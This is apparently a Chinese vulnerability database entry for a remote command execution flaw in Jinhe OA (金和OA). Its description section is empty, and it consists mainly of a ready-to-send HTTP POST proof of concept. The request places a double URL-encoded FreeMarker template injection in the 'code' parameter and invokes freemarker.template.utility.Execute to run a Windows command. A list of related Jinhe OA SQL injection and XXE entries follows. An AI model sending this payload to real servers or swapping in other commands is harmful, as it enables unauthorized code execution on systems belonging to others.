金和OA portalwb-con-template-viewcontemplate 远程命令执行

漏洞描述

PoC代码

POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
Content-Type: application/x-www-form-urlencoded

moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522cmd+/c+set+/a+44255*40057%2522%29%257D%253C%252Fclob%253E&uuid=1

相关漏洞推荐

• 金和OA ArchivesRoomUpdate.aspx SQL注入漏洞
• 金和OA ArchivesShowAcceptAip SQL注入漏洞
• 金和OA ArchivesRoomDeptSave.aspx 存在XML注入漏洞
• 金和OA ArchivesInfoAskAip.aspx SQL注入漏洞
• 金和OA ArchivesInfoSendAip.aspx SQL注入漏洞
• 金和OA ArchivesAdviceAdd.aspx 存在SQL注入漏洞
• 金和OA ArchivesInfoAcceptAip.aspx SQL注入漏洞
• 金和OA ArchivesInfoAsk.aspx SQL注入漏洞
• 金和OA ArchivesDossierExec.aspx SQL注入漏洞
• POC 金和OA ArchivesAdviceInsert.aspx SQL注入漏洞
• 金和OA ArchivesCatalogDocPrint.aspx SQL注入漏洞
• POC 金和OA ArchivesAdviceAdd.aspx SQL注入漏洞
• POC 金和OA appraise-XmlHttp XXE漏洞